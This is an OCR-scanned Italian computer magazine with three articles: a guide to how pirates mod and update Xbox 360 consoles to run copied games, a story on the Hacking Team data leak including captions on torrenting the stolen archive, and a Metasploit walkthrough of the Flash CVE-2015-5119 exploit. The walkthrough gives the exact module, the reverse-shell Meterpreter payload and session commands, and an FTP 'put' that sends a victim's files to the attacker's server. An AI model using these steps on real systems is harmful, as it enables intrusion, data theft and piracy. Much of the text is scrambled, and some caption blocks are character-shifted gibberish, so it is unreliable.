o software) che permettono di eseguire copie


di backup di giochi scaricati dal Web direttamente sulla console senza la necessit, naturalmente, di acquistare il titolo.

Tutto inizia con la Playstation


Dalla prima Playstation in poi, lanciata sul mercato nel 1994, gli hacker sono sempre riusciti
a modificare le console anche quelle di nuova
generazione. Naturalmente, le case produttrici
non sono rimaste a guardare e sono sempre
corse ai ripari aggiornando software e dashboard dei propri dispositivi in modo da prevenire
eventuali hack del sistema e rendendo questi
aggiornamenti necessari al corretto avvio dei
giochi e prevenendo, di fatto, la possibilit di
avviare i backup con sistemi modificati. I pirati
delle console, quindi, una volta effettuata la
non possono restare tranquilli

COS I PIRATI AGGIORNANO LE

IL TASTO SEGRETO PER

AVVIARE LA PERIFERICA
Il pirata avvia la console util
izzando il tasto Eject e atte
nde la fase di caricamento alternativo alla clas
sica dashboard. Al termine
, tramite computer,
si collegher allXbox digitan
do
ricavare la CPU KEY, il codice nel browser lindirizzo IP della console per
identiicativo di ogni Xbox.

| Console di gioco: upgrade sblocca-tutto | Per saperne di pi |

Cos fa lhacker

LE PRINCIPALI MODIFICHE CHE SI POSSONO APPORTARE SULLXBOX 360


TIPO DI MODIFICA

DESCRIZIONE

VANTAGGI

SVANTAGGI

FLASH DEL
LETTORE

Consiste nella riscrittura, tramite


software, del firmware originale
del lettore; lo stesso firmware viene
sostituito con uno preparato ad hoc,
che permetta la riproduzione di ISO
masterizzate su DVD+R DL.

Immediatezza di utilizzo
Permette il gioco online (non garantita la NON esclusione
dal LIVE ufficiale)

Compatibilit limitata con alcuni


giochi
Deve essere aggiornato ad ogni
avvento di nuove protezioni
inserite sui giochi
Richiede un materizzatore
compatibile con tali firmware

RESET GLITCH
HACK

Viene sfruttato un impulso (il glitch),


creato ed implementato da un Hardware
installato (il Glitcher) dentro la console,
al fine di poter inserire, durante la
procedura di avvio della macchina,
un codice non firmato che, una volta
avviato, permetta la riproduzione di
software non firmato dal produttore.

Permette la riproduzione da Hard Disk, interno od esterno,


di codice non firmato, Backup dei propri giochi originali,
Emulatori di retroconsole, homebrew ed applicazione di
terze parti
Permette un pieno controllo e la regolazione della
temperatura di utilizzo della console
Non sono strettamente necessari aggiornamenti successivi
allinstallazione

Non permette il gioco Online


Ha tempi di avvio variabili
(da 30 secondi a 2 minuti
dallaccensione della console)

EMULATORI
DEL LETTORE
ODE

Viene sfruttato un hardware che emula


il lettore della console e permette la
riproduzione di ISO da Hard Disk USB
esterni.

disattivabile
di immediato utilizzo
Permette di effettuare aggiornamenti ufficiali
(disattivandolo)
Permette il gioco online (Non per garantita la NON
esclusione dal LIVE ufficiale)

Non permette la riproduzione di


software non firmato
Non permette lesecuzione di
emulatori od Homebrew
Il costo dellemulatore

Alla modifica RGH citata prima viene


aggiunta una o pi modalit di avvio. In
tal maniera possibile avviare la console
anche in modalit originale e godere dei
benefici che ne conseguono.

Permette la riproduzione da Hard Disk, interno od esterno,


di codice non firmato, Backup dei propri giochi originali,
Emulatori di retroconsole, homebrew ed applicazione di
terze parti
Permette un pieno controllo e la regolazione della
temperatura di utilizzo della console
Permette, in modalit originale, di effettuare
aggiornamenti ufficiali sulla console
Permette il gioco Online in modalit originale (non pero
garantita la NON esclusione dal LIVE ufficiale)

Ha tempi di avvio variabili


(da 30 secondi a 2 minuti
dallaccensione della console)

MULTI
NAND RGH

ma anzi, al contrario, devono mantenere la


loro macchina da gioco sempre aggiornata.
Dovranno verificare periodicamente luscita
in Rete di eventuali upgrade della dashboard

che consentano loro di giocare anche ai videogiochi appena usciti sul mercato o di usare la
kinect senza problemi. Una procedura piuttosto delicata ma che, nel caso della Xbox 360,

anche abbastanza semplice da eseguire: al


pirata, infatti, bastano una chiavetta USB, sulla
quale copiare i tool necessari per completare
la modifica, e la cosiddetta chiave CPUKEY.

XBOX MODIFICATE

3
2

CHE IL DUMP

A
PER LA MODIFIC
sul proprio
IL TOOL MAGICO
ole di gioco scarica
ns
co
lle
de
e
on
ett
an
a cartella

A questo punto lo sm 360 NAND Flasher, lo scompatta in un matta


for
ple
computer il tool Sim di una chiavetta USB (opportunamente
su
pia
co
e
k
dis
dellhard
ult.xex.
in FAT32) il ile Defa

Inserisce la chiav DELLA MEMORIA AB


B
etta in unaporta
USBdella Xbox et IA INIZIO
del Freestyle av
via il ile Defau
lt.xex. Dopo av ramite ilFile Manager
memoria, sulla pe
er eseguito il du
ndrive verr crea
mp della
il pirata estrae la
to il ile lashdm
chiavetta e la co
p.bin. A questo
llega nuovamen
punto
te al PC.

Speciali Win Magazine 43

Cos fa lhacker

| Per saperne di pi | Console di gioco: upgrade sblocca-tutto |

COS I PIRATI AVVIANO I GIOCHI SULLE CONSOLE MODIFICATE

Prima di poter usare la Xbox modiicata, il pirata deve opportunamente trattare i giochi per consentire alla console di leggerli.
Tale procedura cambia a seconda che il gioco viene caricato dallhard disk interno alla console o da una chiavetta USB.

Avvio giochi da disco


Se la modiica alla Xbox stata efettuata aggiornando il irmware del lettore ottico, il
pirata efettuer la masterizzazione dei
giochi su dischi DVD da 8 GB utilizzando un qualsiasi software di masterizzazione, previa patch con un
particolare software facilmente
reperibile in Rete. richiesta una
connessione ad Internet durante lesecuzione del programma.
Dopo aver avviato il tool per
patchare il gioco, il pirata proceder con il settaggio delle varie opzioni. Al termine, proceder al caricamento del gioco in formato ISO selezionando il ile
immagine disponibile su disco. Tutta questa procedura serve per rendere
le copie di backup il pi possibile simili agli originali, onde ce ne fosse
bisogno, e quindi di assicurarne il funzionamento su lettori con la
modiica irmware. Nei canali underground del Web, generalmente,
i giochi si trovano pronti per la masterizzazione e formati da un
ile .ISO e da un ile .DVD con lo stesso nome che precede
lestensione. In IMGBURN sar suiciente selezionare il ile
.DVD; il software automaticamente masterizzer il .ISO
su disco, associandogli alcuni importanti parametri per
una scrittura corretta (come il LAYERBREAK).

CO N LA
LO CC A CO N SO LE
SB
E
R
A
W
FT
SO
IL
te
EN TR O
D A SH B O A R D D un a ve rs io ne di J-r un ne r co nten enat a

rm
l PC
Il pi ra ta av vi a su as e de lla da sh bo ar d. Ne lla sc he m p
le
du
il
re
a
a
m
ric
lti
ca
,
as so 1)
an ch e lu
ce la CP U KE Y (P
ag gi or pr in ci pa le in se ris ad So ur ce e av vi a il proces so di
Lo
fla sh dm p. bi n da o Cr ea te Xe Bu ild Im ag e.
st
na m en to co n il ta

44 Win Magazine Speciali

DU MP
AL LA RIC ERC A DE L NU OV O
sma nett one cop ia sull a

Term inat a la fase di upg rade , lo


to al Pas so 4. Sco lleg a la
chiavett a il file upd flas h.bi n crea
nuovam ente alla Xbox.
ega
coll
la
e
r
pen drive dal com pute
avv ier que sta volt a il file
Dal File Man age r del Free styl e
Default.xex .

| Console di gioco: upgrade sblocca-tutto | Per saperne di pi |

Cos fa lhacker
COSA

Avvio giochi da USB

VUOL DIRE

Nei tipi di modiica in cui permessa la riproduzione di backup da supporti rimovibili USB necessario preparare questi ultimi ainch vengano
riconosciuti dalla console stessa o dallhardware
che li ospita. Nel caso di emulatore del Lettore
ODE, il pirata formatta in NTFS il supporto USB da
utilizzare. Dentro la root principale crea una cartella chiamata GAMES dove andr a copiare le ISO
nude e crude. Mediante alcuni semplici passaggi
sullinterfaccia uiciale (dashboard) della console
caricher il menu di selezione della ISO stessa. Per
le modiiche Reset Glitch Hack e Multi Nand RGH
dovr invece formattare il supporto USB in FAT32 e
creare allinterno una cartella destinata ad ospitare
i giochi in formato GOD o folder. Grazie ad un software di conversione, freeware e reperibile in rete,
il pirata trasforma le ISO nude e crude in formati
riconosciuti dalla console e le copia sul supporto
USB. Al pirata baster poi selezionarne il percorso
di ricerca dallinterfaccia dedicata (Freeboot) per
ritrovarseli tutti nel catalogo di Freeboot stesso,
pronti per essere giocati. ISO2GOD rappresenta il
software di conversione per eccellenza preferito
dagli smanettoni delle console, sia per la praticit che per la velocit di utilizzo. Caricata limmagine ISO del gioco
il pirata inizia con la conversione e al termine provvede alla copia. Alla ine del processo trover direttamente il
gioco convertito sotto forma di cartella alfanumerica, ovviamente nel percorso precedentemente scelto in OUTPUT.
Allo stesso modo possibile selezionare come destinazione lhard disk della console, previa connessione in rete di
questultima tramite cavo Ethernet. Al pirata baster poi impostare lindirizzo IP di questultima ed il gioco fatto.

LA M OD IF IC A DE LLX

BOX SE RV ITA!
A qu est o pu nto il pir
ata car ica sul la co nso
le il nu ovo du mp e
atten de il co mp let am
en to de lla pro ced ura
di ag
Al termine, estrae la ch
iavetta e avvia normalm gio rna me nto.
ente lXbox che,
per la gioia del pirata
, sar pronta per suppo
rtare anche i titoli
di nuova generazione.

DASHBOARD
Indica la versione del
sistema operativo
presente sulla console. Ad ogni differente
versione della dashboard corrisponde
una diversa versione
del kernel.

CPUKEY
una chiave esadecimale univoca associata alla CPU della
console.

BOOTLOADER
Una delle parti del
kernel il cui compito
quello di avviare
tutti i componenti
software necessari
al corretto funzionamento della console.

HOMEBREW
Software realizzati
esclusivamente per
funzionare su console modificate e non
approvati direttamente da Microsoft.

SE LA KINECT FUORI USO


Abbiamo visto che i pirati delle
console una volta efettuata la loro
modiica, non possono restare tranquilli ma sono costretti a mantenere
la loro Xbox sempre aggiornata se
vogliono continuare a giocare gratis
con i nuovi titoli scaricati dalla Rete
o se vogliono divertirsi con i giochi
che usano la Kinect. Nel caso della
Kinect, potrebbe presentarsi a video una schermata di errore che
invita il giocatore ad efettuare un
upgrade del sistema. Va detto che la
Kinect per il corretto funzionamento richiede anche laggiornamento
Avatar installato. Questo succede
principalmente con le Xbox360, con
modiica RGH, che a causa dellag-

giornamento della Dashboard Live


si ritrovano con una versione della
Dash diferente rispetto a quella presente nella parte RGH. Per risolvere
questi problemi (aggiornamento Ki-

nect pi Avatar), il pirata scaricher


da Internet la stessa versione della
Dashboard installata sulla propria
console. Effettuato il download
estrae il contenuto dellarchivio nella
cartella $$ystemupdate e copier il
tutto in una chiavetta USB. Avvia la
console (scollegata dalla Rete) con
la Dashboard Originale, inserisce la
pennetta e attende che la periferica
di gioco porti a termine gli aggiornamenti richiesti.

Speciali Win Magazine 45

Cos fa lhacker

| Parliamo di | Hacking Team |

Hacking Team:
vediamoci chiaro!
I retroscena dello scandalo che ha portato alla luce il Datagate
italiano sulle intercettazioni illegali

lsuonome?HackingTeam.Ilmotivodiqueste
pagine? Dedicarle una storia. Perch? Per ci
che ha fatto. E cosa fa e ha fatto, di preciso,
Hacking Team? In effetti la sua attivit avvolta
nel pi fitto mistero, ma qui, che comincia
la nostra storia. Di questa azienda con sede
a Milano si sapeva che sviluppa software di
sorveglianza, ma non era chiaro fino a dove
arrivasse questa sorveglianza e dove, invece,
iniziasseroconcettiqualiintrusione,spionaggio
e controllo remoto.

Linizio di tutto
Tutto questo, per lo meno, fino al 6 luglio di
questanno.Sonoleprimeoredelmattino,quan-

do dallaccount Twitter ufficiale dellazienda


viene pubblicato un messaggio che, di fatto,
d inizio a un attacco senza precedenti. In breve: oltre 400 gigabyte di dati presi dai server
dellHacking Team vengono riversati in Rete,
sfruttandoinizialmente ilsito disharing Megae
il circuito Torrent. Da quel momento, lazienda
italiana tenta una disperata strategia difensiva,
ma bastano poche ore per accorgersi che il danno irreparabile. Tra le centinaia di gigabyte di
dati trafugati, infatti, figurano elenchi di clienti
e fatture, e-mail di manager e sviluppatori e,
soprattutto, codici sorgenti (cio le istruzioni
che compongono un programma) che danno
vita ai noti software dellHacking Team.

Unazienda scomoda
Prima ancora dinteressarsi al contenuto di
questidati,tuttavia,ilpensierovaairesponsabili
di questo attacco. Chi ha potuto fare questo?
Molti puntano il dito contro la scarsa sicurezza
dei sistemisti milanesi, rei di aver utilizzato
password come 7 o Passw0rd. Tuttavia, al di
l di queste colpe, ancora tutte da verificare,
megliochiedersichiavesseinteressearilasciare
in Rete questo materiale e, di fatto, condannare
alloblio una compagnia che fatturava milioni e
milioni di euro ogni anno. Se da una parte le indaginisonoinunafaseancoratroppoimmatura
per azzardare qualche conclusione, dallaltra le
ipotesi non mancano. La prima che si tratti di

Trovare il materiale top secret


Una volta riversati in rete gli oltre 400 Gigabyte di dati di Hacking Team, partita subito la caccia da parte di individui
senza scrupoli. Ecco come fanno ad attingere a questo materiale, posto che possederlo altamente illegale!
D
LP
U
S
W WR
Q
H XW
UU L W
7R G


R 
W
W R
7X QW
R
SU

D VFUXSR
H XQ DGZDUH
4XHVWL IXUERQL VHQ]
RUUHQW FKH FRQWLHQ
7
R
WDW
DU
6F
D ZZZGHOXJH
QR
WRUUHQW
GR
FH
$F
VX 'HOXJH
VFHOJRQR
TX
FDWWLYHOOR SXQWDQR DQ
ZQORDG )DWWR HVWR
'R
R
FF
FOL
H
UJ
U
SH
WR
WRUUHQ
ULR VLVWHPD RSHUDWLYR
OD YHUVLRQH SHU LO SUGRS
DYYLDUQH LO GRZQORD
46 Win Magazine

ec li

1HO FDVR GL :LQGRZV  JOL EDVWD IDUH XQ GRSSLR


FOLF VXO ILOH VFDULFDWR SHU DYYLDUQH OD SURFHGXUD GL
LQVWDOOD]LRQH 1HOOH VFKHUPDWH GHO ZL]DUG FOLFFDQR
LQ VXFFHVVLRQH 6u 1H[W , $JUHH 1H[W H ,QVWDOO 'L
IDWWR LO SURJUDPPD WRUUHQW q SURQWR SHU LO VXEGROR
SURJHWWR

Cos fa lhacker

| Hacking Team | Parliamo di |

un hacker, o un gruppo di hacker, che si batte


per la libert (digitale ma non solo) e, dunque,
accusa Hacking Team di produrre software
pronti a soffocarla. Per dirne una, la compagnia
di via della Moscova, gi nel 2013, compariva
nellelenco dei nemici di Internet stilato da
Reporters sans frontires. Alcuni indizi, infatti,
mostravanocheilsistemaRCS(RemoteControl
System) sviluppato da Hacking Team era in
uso anche presso governi senza alcuna considerazione dei diritti umani. Lazienda guidata
da David Vincenzetti ha sempre negato questo
tipo di coinvolgimento, eppure, come vedremo,
i dati trafugati lo sbugiardano.

QUESTI GOVERNI CI SPIANO!


La mappa mondiale con la dislocazione dei server di Hacking Team: il sospetto che
i governi di questi 21 paesi abbiano usato il software di spionaggio per scopi non leciti.

Concorrenza sleale
La seconda ipotesi che a sferrare la sortita
informatica ai server milanesi sia stato un
concorrente. Si parla di ex dipendenti con tutto linteresse a far fuori lazienda per proporsi
come valida alternativa ai suoi tanti clienti.
Lemorragia di talenti dalla sede milanese di
Hacking Team, in effetti, rende plausibile anche
questa teoria. Infine, lipotesi pi suggestiva: un
governo colpito dai software made in Italy che,
in qualche modo, voleva frenarne la diffusione.
Oppure, addirittura, un ex cliente governativo
con tutto linteresse a mettere KO la societ dopo averne sfruttato i servigi. Difficile stabilire,
ora, quale sia la teoria pi realistica, ma dalle
informazioni trapelate in merito allattacco
emerge qualche verit assoluta. Innanzitutto,
400 gigabyte di dati non sono una bazzecola.
servito molto tempo, almeno qualche settimana, per scaricarli. Ci posto, possibile che
unazienda composta da esperti di sicurezza
di comprovata fama non si sia accorta di unintrusione del genere? Un furto cos massiccio

lascia tracce non solo a lavoro ultimato, ma


anche in corso dopera: grossi rallentamenti della linea, accessi dallesterno, una certa
instabilit del sistema, per dire le prime che
vengono in mente. Davvero nessun si accorto
di nulla? E soprattutto: davvero, degli esperti,
con anni di esperienza alle spalle, e fior di enti
governativi e societ che dipendono dai loro
programmi,prescindonodallaregolanumero1
dellasicurezzainformatica,ossiautilizzareuna
password sicura? Come detto, impossibile, al
momento, sapere come siano andate realmente
le cose, ma altrettanto difficile ipotizzare un

L
N DW
Q
Q
/L U
R
JL
J
D

H GL
L VFDULFDUH LO PDWHULDO
, OLQN WRUUHQW GD FX LQXD]LRQH , IXUERQL KDQQR
+7 FDPELDQR LQ FRQW D SDJLQD VHPSUH DJJLRUQDWD
FRPXQTXH WURYDWR XQOLQN  'DOOD KRPH GHO VLWR
ZZZZLQPDJD]LQHLWUHFHQWH H VFDULFDQR LO UHODWLYR ILOH
VHOH]LRQDQR XQ OLQN QW
FRQ HVWHQVLRQH WRUUH

attacco in un solo senso, dallesterno e senza


alcun intervento accomodante dallinterno.
Fatto da qualcuno che conosceva molto bene
larchitettura informatica dellazienda.

The Black List


Se in merito alle cause non ci sono certezze,
questeabbondano,invece,sulleattivitdellHacking Team e sui suoi clienti, proprio grazie a
quanto emerso dalla miniera di dati sottratti.
Partiamo dai clienti, con un elenco che include
non solo paesi leciti, ma anche altri sotto embargo o con ben poca considerazione dei diritti

DG
R
LR
QO FF
Z VL
'RDV
P

$ TXHVWR SXQWR L IXUERQL HIIHWWXDQR XQ GRSSLR FOLF


VXO ILOH WRUUHQW DSSHQD VFDULFDWR SHU DSULUH LO ILOH
LQ 'HOXJH H ULWURYDUVL FRQ OHQRUPH DUFKLYLR +DFNLQJ
7HDP VSH]]HWWDWR LQ WDQWL JURVVL ILOH &q FKL VFDULFD
ODUFKLYLR QHOOD VXD LQWHUH]]D FOLFFDQGR VXO SXOVDQWH
$JJLXQJL

S ciali Win Magazine 47

Cos fa lhacker

| Parliamo di | Hacking Team |

che lattacco allHacking Team possa essersi


basato solo su una password troppo semplice?

Software allavanguardia

In questa mappa possibile seguire i percorsi dei dati elaborati dal sistema RCS (Remote Control
System) di Hacking Team per trasmettere le informazioni facendo perdere le loro tracce.

umani: Australia, Azerbaijan, Bahrain, Cile,


Colombia, Cipro, Repubblica Ceca, Ecuador,
Egitto, Etiopia, Germania, Honduras, Ungheria, Italia, Kazakhstan, Lussemburgo, Malesia,
Messico, Mongolia, Marocco, Nigeria, Oman,
Panama, Polonia, Russia, Arabia Saudita, Singapore, Corea del Sud, Spagna, Sudan, Svizzera,
Tailandia, Emirati Arabi, Stati Uniti, Uzbekistan
e Vietnam. A questi, si aggiungono decine di enti
militari e aziende private, in particolare alcuni
colossi finanziari e delle telecomunicazioni.
Una lista da far tremare fior di scrivanie, proprio
per la particolarit dei software sviluppati da
Hacking Team. E qui arriviamo al pezzo forte
dei famosi 400 GB di dati trafugati: il codice che
rivela il funzionamento del software milanese. Di base, il sistema Remote Control System
Galileo, come lazienda stessa lo definisce,
una hacking suite for governmental interception, quindi una sorta di coltellino svizzero
in grado di effettuare intercettazioni a livello
governativo. Pi prosaicamente, parliamo di
un vero e proprio trojan, quindi un programma
che, una volta installato in un dispositivo, in
grado di intercettarne qualsiasi dato e inviarlo
al mandante. Dire trojan, in realt, significa
ben poco: ci sono trojan realizzabili in un paio
dore e molto basilari, altri che richiedono anni
di ricerca e sviluppo. Da quanto emerso analizzando il codice trafugato dagli uffici di Hacking
Team, Galileo era tutto fuorch un trojan banale.
Tuttaltro. Gi nel 2014, i ricercatori di aziende
48 Win Magazine Speciali

di sicurezza informatica quali Kaspersky Lab


e Citizen Lab analizzarono il programma di
Hacking team, evidenziandone buona parte
delle caratteristiche pi avanzate. Per esempio,
la grande versatilit, con moduli in grado dinstallarsi in pressoch qualsiasi dispositivo fisso e
mobile. E poi funzioni per raccogliere e inviare,
o deviare, al mandante e-mail, SMS, telefonate,
posizioni GPS, per arrivare allattivazione di
fotocamera e microfono. E sullo sfondo, una
rete di oltre 350 server sparsi in tutto il mondo,
pronti a gestire la grande molte di dati spiati,
specie se si pensa che, con Galileo, un singolo
individuo poteva controllare fino a centomila
dispositivi. Capito perch viene difficile pensare

A questo punto, molti potrebbero continuare a


ignorare la potenza di software come Galileo, e
le conseguenze di quanto accaduto allazienda
milanese, bollando il tutto come robaccia da
nerd. Non cos. Intendiamoci: non c nessuna
ragione per credere che un software di questo
tipo, costoso e comunque difficile da maneggiare (una fornitura, fatture alla mano, poteva
superare anche il milione di euro), metta in
pericolo la sicurezza di un semplice cittadino.
Quel che tuttavia certo che un trojan come
quello di Hacking Team raffinato quanto basta
per colpire potenzialmente chiunque. E con
chiunque, e questo s dovrebbe interessare il
comune cittadino, intendiamo politici, capi di
stato, piani alti di enti militari e aerospaziali,
colletti bianchi del mondo della finanza. Se lutilizzo di Galileo, cos come altri software dello
stesso tipo, fosse limitato a ragioni di sicurezza,
secondo unetica e parametri di controllo precisi, probabilmente non ci sarebbe motivo per
preoccuparsi. Dopotutto sono questi software,
piaccia o non piaccia, ad avere un ruolo primario nellanti-terrorismo. Tuttavia, la vicenda
Hacking Team mostra una realt amara: un
trojan , a tutti gli effetti, un malware, e non c
modo di utilizzare un malware solo per scopi
lodevoli. nella sua natura essere dannoso, o
forse nella sua natura indurre in tentazione
chi ne ha il controllo. Le conseguenze di questa
vicenda sono incalcolabili. Da una parte, chi
utilizza (o utilizzava) il Remote Control System
per scopi benevoli, ora dovr cambiare strategia perch gli obiettivi cattivi sanno come
difendersi. Dallaltra, chi lo utilizzava per scopi
meno nobili, da questa vicenda ha imparato a
coprire meglio le proprie attivit e a tutelarsi
anche nel caso in cui queste siano esposte alla
gogna pubblica. Difficile stabilire, in questa
storia, chi sia davvero il cattivo.

NON SIAMO SOLI


Hacking Team non lunica azienda specializzata in
questo genere di software oscuro. E non parliamo
solo di soluzioni per lo spionaggio, ma anche di
programmi per difendersi da queste. Un esempio
ReaQta, con sede in Malta e aperta, guarda caso,
da Alberto Pelliccione, un ex di Hacking Team. E poi
MALA s.r.l., di stanza a Torino e fondata da un altro
ex dellazienda milanese, ossia Guido Landi.
Poi ci sono le tedesche AGT e FinFisher,
questultima la vera concorrente del team
di Vincenzetti; e Te4i, con sede a Dubai ma
fondata sempre da italiani.

| Passepartout per i pirati | Fai da te |

Cos fa lhacker

Passepartout
per i pirati
Provato il tool buca-Flash che entra in qualunque computer,
in barba agli antivirus, ai irewall e a tutti i tool di sicurezza

ecodeldatagatedel2013nonsi
ancora spento, Edward Snowden
tuttoraconsideratounpaladino
della libert dagli utenti ed un traditore
dal Governo Statunitense. Lidea che
agenzie governative come lNSA abbianoesageratonellaloroparanoicacaccia
ai nemici delloccidente, controllando
milioni di utenti senza che alcun tribunale avesse autorizzato intercettazioni
dialcuntipo,ormaiaffermata.Quello
che non sapevano, almeno non con
certezza,finoaqualchesettimanafaera
che le agenzie governative non erano
sole in questo lavoro: diversi governi
si sono avvalsi dei servizi di alcune
aziende per compiere le azioni di sorveglianza.Insomma,lostereotipodelle
squadrediespertidisicurezzainformatica assoldati da un qualsiasi governo e
messi a lavorare in un bunker sotterraneoperattaccarecomputerdeipresunti
nemici non era del tutto completo: in
questa immagine mancavano le azien-

de di sicurezza informatica, disposte a


svolgere lo stesso lavoro in cambio di
denaro e per governi diversi (spesso,
governiinlottatraloro).Questeaziende
sono, in un certo senso, i trafficanti di
armi della guerra cybernetica.

Da Milano con successo


Nelle pagine precedenti abbiamo parlato di Hacking Team, unazienda italiana con sede a Milano che una delle
principali nel settore della sicurezza
informatica. HackingTeam diventata
famosa quando un gruppo di attivisti
per la libert di informazione ha deciso
di pubblicare su WikiLeaks una serie
di documenti riservati per un totale di
circa 400 GB di dati riservati con informazioni di ogni tipo che dimostrano la
vendita da parte dellazienda a governi
di tutto il mondo, inclusi quelli che non
rispettano le libert civili (tra i quali il
Sudan,chealmomentosottoembargo
ONU),diunprogrammadipropriapro-

duzione chiamato Remote Control System.Talestrumentoconsente,tramite


lo sfruttamento di alcuni bug scoperti
dalla stessa HackingTeam e mai resi
pubblici, di assumere il controllo di
qualunque computer. Naturalmente,
nessuno degli affari di HackingTeam
eraillegale,anzi:laziendasipremurata di lavorare sempre nellambito della
legislazioneeuropea.Lunicaeccezione
riguardaunafattura,trovatatralevarie
e-mail, di 960.000 euro pagata dai servizisegretidelSudan:gliespertistanno
ancora cercando di capire se questa
vendita possa essere considerata una
violazione dellembargo ONU nei confrontidelladittaturadelpaeseafricano.

Pi exploit per tutti


Ma scoprire il giro daffari dellazienda
milanese non lunico punto di interesse dello studio dei dati trafugati dai
server di HackingTeam. Per chi si occupa di sicurezza informatica, infatti,

COS SCOPRI SE SEI SPIATO DAL SOFTWARE


DI HACKING TEAM
Da noi interpellato, lesperto di sicurezza Raoul Chiesa ha spiegato UEFI preinstallato su molti modelli di schede madre per consentire
che esiste uno strumento per capire se il proprio computer stato al proprio spyware di rimanere invisibile ai software di controllo
infettato dallo spyware di HackingTeam. Questo strumento si installati nel PC delle vittime.
chiama Detekt (lo trovi nella sezione Antivirus&Sicurezza del Win
DVD-Rom) ed stato rilasciato grazie al supporto di organizzazioni
come Amnesty International. Per utilizzare il programma consigliabile scollegare il proprio computer da Internet e disabilitare
temporaneamente lantivirus (inch non si completa il test). Una
procedura guidata allavvio del programma consente di iniziare
facilmente il test, che pu richiedere ino a 30 minuti. Nel caso
venga rilevato uno spyware, possibile tentare di eliminarlo con un
programma come Spybot (lo trovi nella sezione Antivirus&Sicurezza
del Win DVD-Rom), ma sarebbe consigliabile ripristinare lo stato del computer a quello iniziale. Infatti, secondo i Trendlabs di
TrendMicro, HackingTeam eseguiva anche delle modiiche al BIOS

PER SAPERNE

DI PIU
NON SOLO
SPIONAGGIO
Alcune e-mail indicano
rapporti commerciali
di HackingTeam con
aziende di vario tipo,
tra cui anche assicurazioni e banche. Tuttavia, non sappiamo
quali servizi tali aziende abbiano acquistato:
non detto che si tratti
di sistemi per spiare i
clienti, potrebbe invece
trattarsi di semplici
test per la sicurezza dei
loro database.

LEGGI
SUL WEB

https://archive.is/n0om8
Il pirata che ha crackato le
e-mail di HackingTeam
riuscito anche ad entrare
nel loro account Twitter
uiciale e lo ha utilizzato
defacciandolo per annunciare le proprie azioni.
Oggi la pagina Twitter
memorizzata sul sito
archive.is.

Speciali Win Magazine 49

Cos fa lhacker
lobiettivo primario scoprire quanti pi dettagli
possibili sul software Remote Control System
e sugli spyware sviluppati dallazienda milanese, oltre che sui vari bug che ha scoperto nei
principali programmi di uso comune. Infatti,
comprendendo il loro funzionamento, possibile sviluppare delle soluzioni. Non un caso
che nelle settimane successive alla divulgazione
delle informazioni riservate sia stata rilasciata
una valanga di aggiornamenti per Windows,
Flash e molti altri software usati dalla maggioranza degli utenti: sono tutti tentativi di arginare le falle tramite cui HackingTeam riusciva

| Fai da te | Passepartout per i pirati |

a penetrare i computer di qualsiasi utente. C


per un problema: se le caratteristiche di questi
bug sono pubblicamente disponibili significa
che possono accedervi non solo i progettisti di
antivirus e quelli dei programmi buggati, ma
anche i pirati informatici interessati a sfruttare
gli exploit di HackingTeam per commettere
azioni criminali. In altre parole, fino a qualche
settimana fa soltanto i clienti di HackingTeam,
che avevano preso accordi con tale azienda e
lavevano pagata per i suoi servizi, potevano
utilizzare gli exploit contenuti nel programma
RCS per accedere al computer di un qualsiasi

utente. Ora, invece, chiunque pu copiare il


codice sorgente dei vari exploit e utilizzarlo
per i propri scopi. Uno dei primi bug ad essere scoperti stato quello di Flash, noto con il
nome CVE-2015-5119 (www.winmagazine.it/
link/3214). Questo bug, presente in tutte le versioni di Flash dalla 9 in poi, ovvero circa il 50% di
tutti i computer del mondo, potrebbe consentire
ai pirati un accesso remoto al sistema operativo
dellutente vittima. Ottenuto il terminale remoto
poi possibile installare sul sistema della vittima
uno spyware capace di fornire loro il controllo
remoto del sistema in un qualsiasi momento.

Cos funziona lexploit di Flash


Uno dei bug pi pericolosi tra quelli utilizzati da Hacking Team riguarda il componente per browser Flash
Player. Grazie al tool di penetration test Metasploit siamo in grado di capire nei dettagli come funziona.

Caricare lexploit

Avviato il terminale di Metasploit con il


comando msfconsole, il pirata deve prima di tutto indicare quale exploit intende utilizzare. Per scegliere quello basato sulla vulnerabilit
di Flash deve dare il comando use exploit/multi/
browser/adobe_lash_hacking_team_uaf.

Quale pa load usare

Il pirata opta per il classico set payload


windows/meterpreter/reverse_tcp. Poi,
il comando show options indica al pirata quali
siano le opzioni da speciicare: le pi importanti
sono lhost e srvhost, che vanno impostate con
lIP del pirata.

arrivata una vittima

Appena sulla console Metasploit del


pirata appare il messaggio di apertura
di una sessione Meterpreter, il pirata ha vinto.
Gli basta infatti scrivere il comando sessions
-i 1 per ottenere un terminale con accesso al
sistema vittima.
50 Win Magazine Speciali

La pa ina HTML piratata

Il comando exploit veriica che le condizioni


siano adatte e poi avvia il server Web con
una pagina HTML apparentemente bianca contenente il codice malevolo. Nella console apparir il
link che il pirata deve rendere pubblico: qualcosa
del tipo http://www.nomedominio.com/GUkbkX/.

I comandi del pirata

Tramite Meterpreter, il pirata pu ottenere informazioni sul sistema operativo della vittima. Usando il comando shell, pu aprire
un prompt dei comandi. Da qui il pirata pu fare
qualsiasi cosa, per esempio leggere i ile con il
comando dir.

Controllo assoluto

Quando il pirata trova qualcosa di interessante, lancia il comando ftp server.


com per collegarsi al suo server FTP. Con il
comando put C:\Users\utente\ile.jpg /ile.jpg
il pirata invia al proprio server il ile e i documenti che desidera sottrarre.

| Passe

Cos fa lhacker

per i pirati | Fai da te |

ILL CASO HT ANALIZZATO DA RAOUL CHIESA


Sull caso di Hacking Team abbiao chiesto un autorevole paremo
re al pi famoso hacker italiano,
esperto di sicurezza informatia. Ecco cosa ci ha raccontato.
ca
VD
LH
K
&
Il
leak di HackingTeam, oramai eti
\
RG
5DRXO1RE
c
chettata
in tutto il mondo come Hac
ckedTeam,
credo vada considerato
comee uno degli incidenti pi gravi nel
settore delle cosiddette Lawful interceptions (le intercettazioni legali), una
sorta di pietra miliare: tutto cambier, tutto sar diverso, da ora in poi. Ho deinito la violazione, sottrazione e pubblicazione dei dati (illeak) un incidente
tremendo, per diverse ragioni.

suoi clienti. Ora, non c incubo peggiore per unazienda che il vedere i report
di questi test a disposizione di tutti: elenchi di vulnerabilit, password, tutti
i segreti (spesso anche non belli), esposti al mondo intero. In questo caso,
lelenco dei clienti i cui report sono ora liberamente scaricabili lunghissimo:
partiamo dallABI (lAssociazione Bancaria Italiana) e proseguiamo con UbiBanca,
Generali, Unipol, Cattolica, CnpCapitalia, Fondiaria SAI, Itas Assicurazioni, oltre
a ING Direct, Deutsche Bank, Barclays, RSA e Axa. E poiTIM e Alenia Aermacchi.
Da quanto accaduto si possono quindi trarre una serie di lezioni:

